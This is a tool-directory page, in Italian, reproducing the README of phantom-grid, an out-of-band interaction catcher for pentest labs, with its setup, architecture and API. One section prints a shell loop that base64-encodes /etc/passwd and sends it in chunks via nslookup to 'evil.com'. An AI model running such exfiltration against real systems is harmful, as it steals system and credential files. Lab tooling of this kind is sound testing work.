Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
phantom-grid — Alternativa gratuita a Burp Collaborator - cattura di interazioni OOB (HTTP/HTTPS/DNS) con SQLite e riassemblaggio dell'exfil | Kitploit
Strumenti/GitHubGitHub/evkir/phantom-grid
Generazione di PayloadAnalisi delle VulnerabilitàSfruttamento di Applicazioni WebEsfiltrazione DatiRaccolta InformazioniSicurezza WebPenetration TestingUtilità e FrameworkRed TeamingAnalisi DNS
GitHub
1121 mese faNon ancora revisionato
evkir/phantom-grid

phantom-grid

Alternativa gratuita a Burp Collaborator - cattura di interazioni OOB (HTTP/HTTPS/DNS) con SQLite e riassemblaggio dell'exfil

Vedi RepositorySito web

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Phantom Grid

⬡ Phantom Grid

Alternativa gratuita e open-source a Burp Collaborator per lab di penetration testing
Cattura di interazioni Out-of-Band (OOB) · HTTP/HTTPS · DNS · SQLite · Riassemblaggio exfil


Cos'è questo?

Phantom Grid è uno strumento self-hosted per la cattura di interazioni OOB (Out-of-Band) — un'alternativa gratuita a Burp Collaborator per risolvere lab di penetration testing (PortSwigger Web Security Academy, HackTheBox, TryHackMe, ecc.).

Funzionalità v2.0

FunzionalitàDescrizione
Cattura HTTP + HTTPSDual-stack con certificati TLS self-signed generati automaticamente
Cattura DNSServer DNS integrato sulla porta 53
Riassemblaggio DNS ExfilRiassemblaggio automatico dei chunk da esfiltrazione DNS multi-parte
Persistenza SQLiteTutti i dati sopravvivono ai riavvii del server (modalità WAL per le prestazioni)
40+ Template di PayloadSSRF, XXE, SQLi OOB, CMDi, SSTI, DNS exfil — pronti da copiare
Dashboard TatticaInterfaccia command center con monitoraggio in tempo reale
Docker ReadyDeployment con un solo comando
REST APIAPI completa per la gestione di token/interazioni/exfil

Avvio Rapido

Opzione 1: Python

git clone https://github.com/YOUR_USERNAME/phantom-grid.git
cd phantom-grid
pip install -r server/requirements.txt

# HTTP only
python server/server.py

# HTTP + HTTPS (auto-generates self-signed cert)
python server/server.py --https

# Full stack (requires sudo for DNS port 53)
sudo python server/server.py --https --dns

Opzione 2: Docker

git clone https://github.com/YOUR_USERNAME/phantom-grid.git
cd phantom-grid
docker compose up -d

Opzione 3: ngrok (per lab senza un VPS)

python server/server.py --https &
ngrok http 9090
# Use the ngrok HTTPS URL in your payloads

Architettura

┌──────────────────────────────────────────────────────────────┐
│                      PHANTOM GRID v2.0                        │
│                                                               │
│  ┌─────────────┐      ┌─────────────────────────────────┐   │
│  │  Dashboard   │─API─▶│  Flask Server                   │   │
│  │  (React)     │      │                                 │   │
│  └─────────────┘      │  :9090  HTTP  capture + API     │   │
│                         │  :9443  HTTPS capture + API     │   │
│  ┌─────────────┐      │  :53    DNS   capture            │   │
│  │ Target App   │─────▶│                                 │   │
│  └─────────────┘      └──────────┬──────────────────────┘   │
│                                    │                          │
│                         ┌──────────▼──────────┐              │
│                         │   SQLite Database    │              │
│                         │   phantom_grid.db    │              │
│                         │                      │              │
│                         │  tokens              │              │
│                         │  interactions         │              │
│                         │  dns_exfil_sessions  │              │
│                         │  dns_exfil_chunks    │              │
│                         └─────────────────────┘              │
│                                                               │
└──────────────────────────────────────────────────────────────┘

Supporto HTTPS

Le applicazioni moderne spesso bloccano le richieste mixed-content (http:// da pagine https://). Phantom Grid v2.0 esegue HTTPS insieme a HTTP.

Certificato self-signed generato automaticamente

python server/server.py --https
# Generates certs/server.pem + certs/server.key automatically
# HTTPS available at https://0.0.0.0:9443

Certificato personalizzato (Let's Encrypt, ecc.)

python server/server.py --https \
  --cert /etc/letsencrypt/live/yourdomain/fullchain.pem \
  --key /etc/letsencrypt/live/yourdomain/privkey.pem

Con ngrok (HTTPS pubblico istantaneo)

python server/server.py &
ngrok http 9090
# ngrok provides a trusted HTTPS URL automatically

Riassemblaggio Esfiltrazione DNS

Phantom Grid riassembla automaticamente i dati di esfiltrazione DNS suddivisi in chunk. Questo è fondamentale per estrarre payload di grandi dimensioni che devono essere suddivisi su più lookup DNS (label limitate a 63 byte).

Formati Supportati

FormatoEsempioCaso d'Uso
Semplicedata.TOKEN.domainEsfiltrazione di un singolo valore
Indicizzato0.chunk1.TOKEN.domainSessione automatica, chunk ordinati
Taggatosess1.0.chunk1.TOKEN.domainSessione nominata con ordinamento
Segnale di fineend.sess1.TOKEN.domainMarca la sessione come completata

Esempio: Esfiltrare /etc/passwd via DNS

Sul target:

# Split file into 50-byte base64 chunks and send via DNS
data=$(base64 /etc/passwd | tr -d '\n')
token="a1b2c3d4e5f6"
domain="evil.com"
i=0
while [ -n "$data" ]; do
  chunk=$(echo "$data" | cut -c1-50)
  data=$(echo "$data" | cut -c51-)
  nslookup "exfil.$i.$chunk.$token.$domain" >/dev/null 2>&1
  i=$((i+1))
done
nslookup "end.exfil.$token.$domain" >/dev/null 2>&1

Visualizzare i dati riassemblati:

curl http://localhost:9090/api/tokens/a1b2c3d4e5f6/exfil

Risposta:

[{
  "session_tag": "exfil",
  "completed": 1,
  "chunk_count": 12,
  "reassembled": "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYm..."
}]

Persistenza SQLite

Tutti i dati sono memorizzati in phantom_grid.db utilizzando la modalità SQLite WAL per prestazioni di lettura/scrittura concorrenti.

phantom_grid.db
├── tokens                 — Token metadata
├── interactions            — All HTTP/DNS captures
├── dns_exfil_sessions     — Grouped exfil sessions
└── dns_exfil_chunks       — Individual exfil data chunks

I dati sopravvivono ai riavvii del server. Esegui il backup copiando phantom_grid.db.


Riferimento API

Token

MetodoEndpointDescrizione
GET/api/tokensElenca tutti i token con statistiche
POST/api/tokensCrea token {"label": "...", "notes": "..."}
PATCH/api/tokens/<id>Aggiorna label/note del token
DELETE/api/tokens/<id>Elimina token + tutti i dati (CASCADE)

Interazioni

MetodoEndpointDescrizione
GET/api/tokens/<id>/interactions?limit=&offset=Ottieni le interazioni del token
DELETE/api/tokens/<id>/interactionsCancella le interazioni
GET/api/log?limit=Log globale (tutti i token)
GET/api/poll?since=<ISO>Interroga nuove interazioni

Esfiltrazione DNS

MetodoEndpointDescrizione
GET/api/tokens/<id>/exfilOttieni le sessioni exfil con dati riassemblati

Sistema

MetodoEndpointDescrizione
GET/api/statsStatistiche globali (conteggi, dimensione DB)
GET/healthControllo di stato

Endpoint di Cattura

Scarica lo strumento